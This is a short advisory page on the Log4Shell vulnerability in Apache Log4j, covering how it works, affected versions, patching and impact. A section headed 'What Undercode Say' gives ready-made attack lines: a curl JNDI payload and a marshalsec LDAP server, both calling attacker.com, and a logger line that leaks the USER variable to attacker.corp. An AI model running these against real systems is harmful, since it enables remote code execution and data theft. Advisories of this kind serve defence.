Multiple Platforms, Deserialization of Untrusted Data, CVE-2021-44228 (Critical)

Listen to this Post

The vulnerability, known as Log4Shell, resides in the Java logging library Apache Log4j. It works through improper validation of input during log message processing. The core issue is within the JNDI (Java Naming and Directory Interface) lookup feature combined with message lookup substitution. When a logged string contains a payload like ${jndi:ldap://malicious-site.com/exploit}, the library recursively resolves this lookup. It sends a request to the specified LDAP server, which can respond with a path to a remote Java class file. The vulnerable application then fetches and executes this malicious code, leading to a complete Remote Code Execution (RCE) compromise. This attack vector is especially dangerous because the input can be provided through common, logged data such as HTTP headers or user-agent strings.
Platform: Apache Log4j
Version: 2.0-beta9 to 2.14.1

Vulnerability : RCE

Severity: Critical

date: 2021-12-09

Prediction: Patch Available

What Undercode Say:

`curl -H “User-Agent: ${jndi:ldap://attacker.com/a}” vulnerable-app.com`

`java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer “http://attacker.com/Exploit”`

`import org.apache.logging.log4j.LogManager;logger.error(“${jndi:ldap://${env:USER}.attacker.corp/a}”);`

How Exploit:

Craft JNDI lookup strings in any input field that gets logged, such as HTTP headers, form data, or user agents. A malicious LDAP server responds with a remote codebase location, forcing the application to load and execute arbitrary code.

Protection from this CVE

Upgrade Log4j to version 2.15.0 or later. Apply vendor-specific mitigations if immediate patching is impossible. Set the system property `log4j2.formatMsgNoLookups` to `true` or remove the `JndiLookup` class from the classpath to disable the vulnerable functionality.

Impact:

Full server compromise leading to data theft, ransomware deployment, and initial access for further network penetration. Widespread impact due to Log4j’s ubiquitous use in enterprise software, cloud services, and internet-facing applications.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top